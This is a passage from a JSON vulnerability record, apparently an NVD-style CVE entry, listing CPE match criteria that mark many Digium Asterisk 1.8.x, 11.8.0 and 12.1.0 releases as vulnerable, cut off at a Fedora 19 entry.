              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "984CD6D9-4A54-4065-8401-DC555AB95425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CDE13439-4124-4BDE-A068-460BCF96419B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "3F4DC562-649E-4105-8B3E-43F02BD593FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "58F4BFC9-E02A-4121-8D34-99022AB8B45A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "9C806F87-C897-48E4-8533-A4EBC6B77078",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "08B8C143-93FF-44DD-8F61-6F4FEE977371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "8859F234-5066-40DD-862C-0F3CCA98AFB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75962F03-EC19-4920-9FA7-2D422E6E83F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B5D0BB0E-1BB0-4F31-9C5D-DC1A069E52DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "33FE3DCE-74B5-49A4-BC18-34B22CA83947",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF2E25F3-053D-4F7D-A35D-706A401CCAA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2A153336-10C4-4C42-AC66-AC1351887EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "0C2FF4E9-2513-4022-AF80-6F44A2287D6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "43E00618-19F6-4828-818A-95C9106097B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CEC4F4AE-7BD8-437F-8838-FE564BCB7FA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2BC3B463-6B2C-42AF-BE13-50B7D63E7F05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2799111C-06DB-4979-8F81-A8C09D53E5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "4F3C35F1-CBF2-4F77-AC19-574DEF2652A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75EA94FD-D16A-49BC-A418-36EFC187EC7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "A14FC2A1-29D5-49FE-92A9-D61833BF1C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5E3C5C1E-67E9-401A-BA52-FCB32CA4473C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "501F5764-BBC2-426A-AF01-7FB477850073",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "FDB35CE5-4EDB-4949-A5E4-1BD721CCA469",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "82ED9CD2-504E-4D7B-B242-2511A7730776",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EF6E50F5-605A-4D2B-B55D-8AB251532E8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:-:*:*:*:*:*:*",
              "matchCriteriaId": "F6C796AE-95EE-4EAB-959C-1C1353C565A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EEAF3B2E-E520-4F43-ACC5-0F01A6247199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "085D4102-E2E8-496C-85B7-714FD3639BE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E0ABBB2C-19EC-4D6C-A1EA-AEF0ABA4123D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "981F3994-392D-47DB-97DA-AC15BA070A36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "94691EE6-266F-46CE-B388-0289EB39D91A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C2FD962-B1D5-41E5-884E-0C3F7F9DACE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "096E966A-878B-426F-AB40-BB476B17B969",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "852DAF2A-86F3-4D05-91DC-6A2FBC214736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7D721486-3043-4380-A73C-44B4DD0E34C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F29E2EE-B6E8-4E55-84A8-3BD0658387EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "837BF2BD-814F-4503-91DF-EE16B5A4921D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "15FCDDB3-62D8-446C-B57C-F3BBFBD13491",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03512BDE-E441-46F6-88B7-16A2468CA199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902CAF9D-9D02-47FA-AE2E-EC1268A32BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "80AD87B5-B796-4C44-8A6D-0B22AA2903CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*",
